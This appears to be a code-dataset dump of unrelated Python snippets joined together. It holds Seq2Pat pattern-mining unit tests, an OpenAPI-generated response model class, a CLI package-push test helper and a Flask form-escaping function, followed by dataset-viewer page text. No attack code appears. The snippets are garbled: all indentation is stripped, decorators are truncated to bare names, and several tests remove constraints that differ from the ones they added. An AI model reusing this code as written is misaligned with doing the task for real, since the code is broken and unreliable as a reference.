seq2pat = Seq2Pat(sequences)
unconstrained_result = seq2pat.get_patterns(1)
self.assertListEqual([[11, 12, 1], [11, 12, 13, 1], [11, 13, 1], [12, 13, 1]], unconstrained_result)
attributes = [[10, 20, 30]]
att1 = Attribute(attributes)
gap_constraint = seq2pat.add_constraint((11 <= att1.gap() <= 19))
self.assertListEqual([], seq2pat.get_patterns(1))
seq2pat.remove_constraint((11 <= att1.gap() <= 19))
gap_constraint = seq2pat.add_constraint((10 <= att1.gap() <= 11))
self.assertListEqual([[11, 12, 1], [11, 12, 13, 1], [12, 13, 1]], seq2pat.get_patterns(1))
seq2pat.remove_constraint((10 <= att1.gap() <= 11))
gap_constraint = seq2pat.add_constraint((11 <= att1.gap() <= 20))
self.assertListEqual([[11, 13, 1]], seq2pat.get_patterns(1))
seq2pat.remove_constraint((11 <= att1.gap() <= 20))
seq2pat.add_constraint((10 <= att1.gap() <= 20))
self.assertListEqual([[11, 12, 1], [11, 12, 13, 1], [11, 13, 1], [12, 13, 1]], seq2pat.get_patterns(1))
def test_span_inequality(self):
sequences = [[11, 12, 13]]
seq2pat = Seq2Pat(sequences)
unconstrained_result = seq2pat.get_patterns(1)
self.assertListEqual([[11, 12, 1], [11, 12, 13, 1], [11, 13, 1], [12, 13, 1]], unconstrained_result)
attributes = [[10, 20, 30]]
att1 = Attribute(attributes)
span_constraint = seq2pat.add_constraint((11 <= att1.span() <= 19))
self.assertListEqual([], seq2pat.get_patterns(1))
seq2pat.remove_constraint((11 <= att1.span() <= 19))
span_constraint = seq2pat.add_constraint((10 <= att1.span() <= 19))
self.assertListEqual([[11, 12, 1], [12, 13, 1]], seq2pat.get_patterns(1))
seq2pat.remove_constraint((10 <= att1.span() <= 11))
span_constraint = seq2pat.add_constraint((11 <= att1.span() <= 20))
self.assertListEqual([[11, 12, 13, 1], [11, 13, 1]], seq2pat.get_patterns(1))
seq2pat.remove_constraint((11 <= att1.span() <= 20))
span_constraint = seq2pat.add_constraint((10 <= att1.span() <= 20))
self.assertListEqual([[11, 12, 1], [11, 12, 13, 1], [11, 13, 1], [12, 13, 1]], seq2pat.get_patterns(1))
def test_average_inequality(self):
sequences = [[11, 12, 13]]
seq2pat = Seq2Pat(sequences)
unconstrained_result = seq2pat.get_patterns(1)
self.assertListEqual([[11, 12, 1], [11, 12, 13, 1], [11, 13, 1], [12, 13, 1]], unconstrained_result)
attributes = [[10, 20, 30]]
att1 = Attribute(attributes)
gap_constraint = seq2pat.add_constraint((16 <= att1.average() <= 19))
self.assertListEqual([], seq2pat.get_patterns(1))
seq2pat.remove_constraint((16 <= att1.average() <= 24))
gap_constraint = seq2pat.add_constraint((15 <= att1.average() <= 19))
self.assertListEqual([[11, 12, 1]], seq2pat.get_patterns(1))
seq2pat.remove_constraint((15 <= att1.average() <= 19))
seq2pat.add_constraint((16 <= att1.average() <= 20))
self.assertListEqual([[11, 12, 13, 1], [11, 13, 1]], seq2pat.get_patterns(1))
seq2pat.remove_constraint((16 <= att1.average() <= 20))
seq2pat.add_constraint((15 <= att1.average() <= 25))
self.assertListEqual([[11, 12, 1], [11, 12, 13, 1], [11, 13, 1], [12, 13, 1]], seq2pat.get_patterns(1))
def test_median_inequality(self):
sequences = [[11, 12, 13]]
seq2pat = Seq2Pat(sequences)
unconstrained_result = seq2pat.get_patterns(1)
self.assertListEqual([[11, 12, 1], [11, 12, 13, 1], [11, 13, 1], [12, 13, 1]], unconstrained_result)
attributes = [[10, 20, 30]]
att1 = Attribute(attributes)
gap_constraint = seq2pat.add_constraint((16 <= att1.median() <= 19))
self.assertListEqual([], seq2pat.get_patterns(1))
seq2pat.remove_constraint((16 <= att1.median() <= 19))
gap_constraint = seq2pat.add_constraint((15 <= att1.median() <= 19))
self.assertListEqual([[11, 12, 1]], seq2pat.get_patterns(1))
seq2pat.remove_constraint((15 <= att1.median() <= 19))
seq2pat.add_constraint((16 <= att1.median() <= 20))
self.assertListEqual([[11, 12, 13, 1], [11, 13, 1]], seq2pat.get_patterns(1))
seq2pat.remove_constraint((16 <= att1.median() <= 20))
seq2pat.add_constraint((15 <= att1.median() <= 25))
self.assertListEqual([[11, 12, 1], [11, 12, 13, 1], [11, 13, 1], [12, 13, 1]], seq2pat.get_patterns(1))
def test_simultaneaous_mining(self):
sequences = [[11, 12, 13]]
seq2pat = Seq2Pat(sequences)
seq2pat2 = Seq2Pat(sequences)
unconstrained_result = seq2pat.get_patterns(1)
unconstrained_result2 = seq2pat2.get_patterns(1)
self.assertListEqual(unconstrained_result, unconstrained_result2)
self.assertListEqual([[11, 12, 1], [11, 12, 13, 1], [11, 13, 1], [12, 13, 1]], unconstrained_result)
def test_min_frequence_negative(self):
seq2pat = Seq2Pat(sequences=[[1, 1, 2, 1, 4], [3, 2, 1], [3, 1, 3, 4]])
price = Attribute(values=[[5, 5, 3, 8, 2], [1, 3, 3], [4, 5, 2, 1]])
with self.assertRaises(ValueError):
patterns = seq2pat.get_patterns(min_frequency=(- 1))
def test_min_frequence_zero_int(self):
seq2pat = Seq2Pat(sequences=[[1, 1, 2, 1, 4], [3, 2, 1], [3, 1, 3, 4]])
with self.assertRaises(ValueError):
patterns = seq2pat.get_patterns(min_frequency=0)
def test_min_frequence_zero_float(self):
seq2pat = Seq2Pat(sequences=[[1, 1, 2, 1, 4], [3, 2, 1], [3, 1, 3, 4]])
with self.assertRaises(ValueError):
patterns = seq2pat.get_patterns(min_frequency=0.0)
def test_min_frequence_float_large(self):
seq2pat = Seq2Pat(sequences=[[1, 1, 2, 1, 4], [3, 2, 1], [3, 1, 3, 4]])
price = Attribute(values=[[5, 5, 3, 8, 2], [1, 3, 3], [4, 5, 2, 1]])
seq2pat.add_constraint(((- 6) <= price.gap()))
with self.assertRaises(ValueError):
patterns = seq2pat.get_patterns(min_frequency=2.5)
def test_sequence_with_empty_list(self):
sequences = [[11, 12, 13], []]
with self.assertRaises(ValueError):
seq2pat = Seq2Pat(sequences)
values = [[11, 12, 13], []]
with self.assertRaises(ValueError):
price = Attribute(values)
def test_min_frequence_float_one_row(self):
sequences = [[11, 12, 13]]
min_frequency = 0.9
seq2pat = Seq2Pat(sequences)
with self.assertRaises(ValueError):
patterns = seq2pat.get_patterns(min_frequency=min_frequency)
min_frequency = 1.0
self.assertListEqual([[11, 12, 1], [11, 12, 13, 1], [11, 13, 1], [12, 13, 1]], seq2pat.get_patterns(min_frequency=min_frequency))
def test_min_frequence_float_theta_ge_one(self):
sequences = [[11, 12, 13], [11, 12, 13, 14]]
min_frequency = 0.9
seq2pat = Seq2Pat(sequences)
unconstrained_result = seq2pat.get_patterns(min_frequency=min_frequency)
self.assertListEqual([[11, 12, 2], [11, 12, 13, 2], [11, 13, 2], [12, 13, 2], [11, 12, 13, 14, 1], [11, 12, 14, 1], [11, 13, 14, 1], [11, 14, 1], [12, 13, 14, 1], [12, 14, 1], [13, 14, 1]], unconstrained_result)
attributes = [[10, 20, 30], [10, 20, 30, 40]]
att1 = Attribute(attributes)
gap_constraint = seq2pat.add_constraint((10 <= att1.gap() <= 11))
self.assertListEqual([[11, 12, 2], [11, 12, 13, 2], [12, 13, 2], [11, 12, 13, 14, 1], [12, 13, 14, 1], [13, 14, 1]], seq2pat.get_patterns(min_frequency=min_frequency))
def test_min_frequence_float_theta_le_one(self):
sequences = [[11, 12, 13], [11, 12, 13, 14]]
min_frequence = 0.4
seq2pat = Seq2Pat(sequences)
with self.assertRaises(ValueError):
patterns = seq2pat.get_patterns(min_frequency=min_frequence)
def test_num_rows_ge_one(self):
sequences = []
min_frequency = 1
with self.assertRaises(ValueError):
seq2pat = Seq2Pat(sequences)
seq2pat = Seq2Pat(sequences=[[11, 12, 13]])
seq2pat._num_rows = 0
with self.assertRaises(ValueError):
patterns = seq2pat.get_patterns(min_frequency=min_frequency)
def test_repeated_calls_seq2pat(self):
sequences = [[11, 12, 13], [11, 12, 13, 14]]
seq2pat = Seq2Pat(sequences)
unconstrained_result_1 = seq2pat.get_patterns(0.9)
self.assertListEqual([[11, 12, 2], [11, 12, 13, 2], [11, 13, 2], [12, 13, 2], [11, 12, 13, 14, 1], [11, 12, 14, 1], [11, 13, 14, 1], [11, 14, 1], [12, 13, 14, 1], [12, 14, 1], [13, 14, 1]], unconstrained_result_1)
unconstrained_result_2 = seq2pat.get_patterns(0.9)
self.assertListEqual([[11, 12, 2], [11, 12, 13, 2], [11, 13, 2], [12, 13, 2], [11, 12, 13, 14, 1], [11, 12, 14, 1], [11, 13, 14, 1], [11, 14, 1], [12, 13, 14, 1], [12, 14, 1], [13, 14, 1]], unconstrained_result_2)
unconstrained_result_3 = seq2pat.get_patterns(2)
self.assertListEqual([[11, 12, 2], [11, 12, 13, 2], [11, 13, 2], [12, 13, 2]], unconstrained_result_3)
def test_repeated_calls_seq2pat_add_remove_ct(self):
sequences = [[11, 12, 13]]
seq2pat = Seq2Pat(sequences)
unconstrained_result = seq2pat.get_patterns(1)
self.assertListEqual([[11, 12, 1], [11, 12, 13, 1], [11, 13, 1], [12, 13, 1]], unconstrained_result)
attributes = [[10, 20, 30]]
att1 = Attribute(attributes)
med_constraint = seq2pat.add_constraint((15 <= att1.median() <= 19))
gap_constraint = seq2pat.add_constraint((5 <= att1.average() <= 15))
self.assertListEqual([[11, 12, 1]], seq2pat.get_patterns(1))
seq2pat.remove_constraint(med_constraint)
seq2pat.remove_constraint(gap_constraint)
self.assertListEqual([[11, 12, 1], [11, 12, 13, 1], [11, 13, 1], [12, 13, 1]], seq2pat.get_patterns(1))
def test_max_span(self):
sequences = [[11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23]]
seq2pat = Seq2Pat(sequences)
default_result = seq2pat.get_patterns(1)
self.assertEqual(len(default_result), 2546)
def test_max_span_none(self):
sequences = [[11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23]]
seq2pat = Seq2Pat(sequences, max_span=None)
unconstrained_result = seq2pat.get_patterns(1)
self.assertEqual(len(unconstrained_result), 8178)
def test_max_span_customize(self):
sequences = [[11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30]]
seq2pat = Seq2Pat(sequences, max_span=13)
result = seq2pat.get_patterns(1)
self.assertEqual(len(result), 36843)
self.assertEqual(max(list(map(len, result))), 14)
def test_sequence_contain_zeros(self):
sequences = [[1, 0], [0, 1]]
with self.assertRaises(ValueError):
seq2pat = Seq2Pat(sequences) |
class ResponseObject(ModelNormal):
allowed_values = {}
validations = {}
_property
def additional_properties_type():
return (bool, date, datetime, dict, float, int, list, str, none_type)
_nullable = False
_property
def openapi_types():
return {'cache_condition': (str, none_type), 'content': (str,), 'content_type': (str, none_type), 'name': (str,), 'status': (str,), 'response': (str,), 'request_condition': (str, none_type)}
_property
def discriminator():
return None
attribute_map = {'cache_condition': 'cache_condition', 'content': 'content', 'content_type': 'content_type', 'name': 'name', 'status': 'status', 'response': 'response', 'request_condition': 'request_condition'}
read_only_vars = {}
_composed_schemas = {}
_js_args_to_python_args
def _from_openapi_data(cls, *args, **kwargs):
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
self = super(OpenApiModel, cls).__new__(cls)
if args:
raise ApiTypeError(('Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments.' % (args, self.__class__.__name__)), path_to_item=_path_to_item, valid_classes=(self.__class__,))
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = (_visited_composed_classes + (self.__class__,))
for (var_name, var_value) in kwargs.items():
if ((var_name not in self.attribute_map) and (self._configuration is not None) and self._configuration.discard_unknown_keys and (self.additional_properties_type is None)):
continue
setattr(self, var_name, var_value)
return self
required_properties = set(['_data_store', '_check_type', '_spec_property_naming', '_path_to_item', '_configuration', '_visited_composed_classes'])
_js_args_to_python_args
def __init__(self, *args, **kwargs):
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(('Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments.' % (args, self.__class__.__name__)), path_to_item=_path_to_item, valid_classes=(self.__class__,))
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = (_visited_composed_classes + (self.__class__,))
for (var_name, var_value) in kwargs.items():
if ((var_name not in self.attribute_map) and (self._configuration is not None) and self._configuration.discard_unknown_keys and (self.additional_properties_type is None)):
continue
setattr(self, var_name, var_value)
if (var_name in self.read_only_vars):
raise ApiAttributeError(f'`{var_name}` is a read-only attribute. Use `from_openapi_data` to instantiate class with read only attributes.') |
def push_package(package_id: PackageId, runner: CliRunner) -> None:
print('Trying to push {}: {}'.format(package_id.package_type.value, str(package_id.public_id)))
cwd = os.getcwd()
try:
agent_name = 'some_agent'
result = runner.invoke(cli, [*CLI_LOG_OPTION, 'create', '--local', '--empty', agent_name], standalone_mode=False)
assert (result.exit_code == 0)
os.chdir(agent_name)
result = runner.invoke(cli, [*CLI_LOG_OPTION, 'add', '--local', package_id.package_type.value, str(package_id.public_id)], standalone_mode=False)
assert (result.exit_code == 0)
src = os.path.join('vendor', package_id.public_id.author, (package_id.package_type.value + 's'), package_id.public_id.name)
dest = os.path.join((package_id.package_type.value + 's'), package_id.public_id.name)
shutil.copytree(src, dest)
result = runner.invoke(cli, [*CLI_LOG_OPTION, 'push', package_id.package_type.value, str(package_id.public_id)], standalone_mode=False)
assert (result.exit_code == 0), "Publishing {} with public_id '{}' failed with: {}".format(package_id.package_type, package_id.public_id, result.output)
except Exception as e:
print('\n\nAn exception occured: {}\n\n'.format(e))
finally:
os.chdir(cwd)
result = runner.invoke(cli, [*CLI_LOG_OPTION, 'delete', agent_name], standalone_mode=False)
assert (result.exit_code == 0)
print('Successfully pushed {}: {}'.format(package_id.package_type.value, str(package_id.public_id))) |
def _get_meta_from_request(request: Request):
meta = {'device_name': escape(request.form['device_name']), 'device_part': escape(request.form['device_part']), 'device_class': escape(request.form['device_class']), 'vendor': escape(request.form['vendor']), 'version': escape(request.form['version']), 'release_date': escape(request.form['release_date']), 'requested_analysis_systems': request.form.getlist('analysis_systems'), 'tags': escape(request.form['tags'])}
_get_meta_from_dropdowns(meta, request)
if ('file_name' in request.form):
meta['file_name'] = escape(request.form['file_name'])
return meta |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.